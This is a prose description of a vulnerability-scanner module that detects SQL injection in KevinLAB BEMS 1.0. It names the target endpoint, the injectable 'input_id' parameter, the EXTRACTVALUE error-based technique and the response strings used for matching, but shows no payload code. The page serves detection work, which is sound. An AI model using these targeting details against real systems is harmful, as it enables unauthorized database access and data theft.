KevinLAB BEMS 1.0 - SQL Injection

What is the "KevinLAB BEMS 1.0 - SQL Injection?"

The "KevinLAB BEMS 1.0 - SQL Injection" module is designed to detect a SQL injection vulnerability in the KevinLAB BEMS 1.0 software. This vulnerability allows an attacker to manipulate the SQL queries executed by the application, potentially leading to unauthorized access, data leakage, or other malicious activities. The severity of this vulnerability is classified as critical, indicating the high potential impact it can have on the security of the system.

This module was authored by gy741.

Impact

A successful exploitation of the SQL injection vulnerability in KevinLAB BEMS 1.0 can have severe consequences. It can allow an attacker to bypass authentication mechanisms, gain unauthorized access to sensitive data, modify or delete data, or execute arbitrary commands on the underlying database server. This can lead to a compromise of the entire system, loss of data, and potential legal and financial implications.

How the module works?

The module works by sending a crafted HTTP POST request to the target application's "/http/index.php" endpoint. The request includes a payload that attempts to exploit the SQL injection vulnerability by injecting malicious SQL code into the "input_id" parameter. The payload is designed to extract sensitive information from the database using the "EXTRACTVALUE" function.

The module then uses matching conditions to determine if the vulnerability is present. It checks for specific error messages indicating an XPATH syntax error and the presence of the string "\\ZSL1ZSL" in the response. Additionally, it verifies that the HTTP response status code is 200, indicating a successful request.

By analyzing the response and matching conditions, the module can determine if the target application is vulnerable to SQL injection.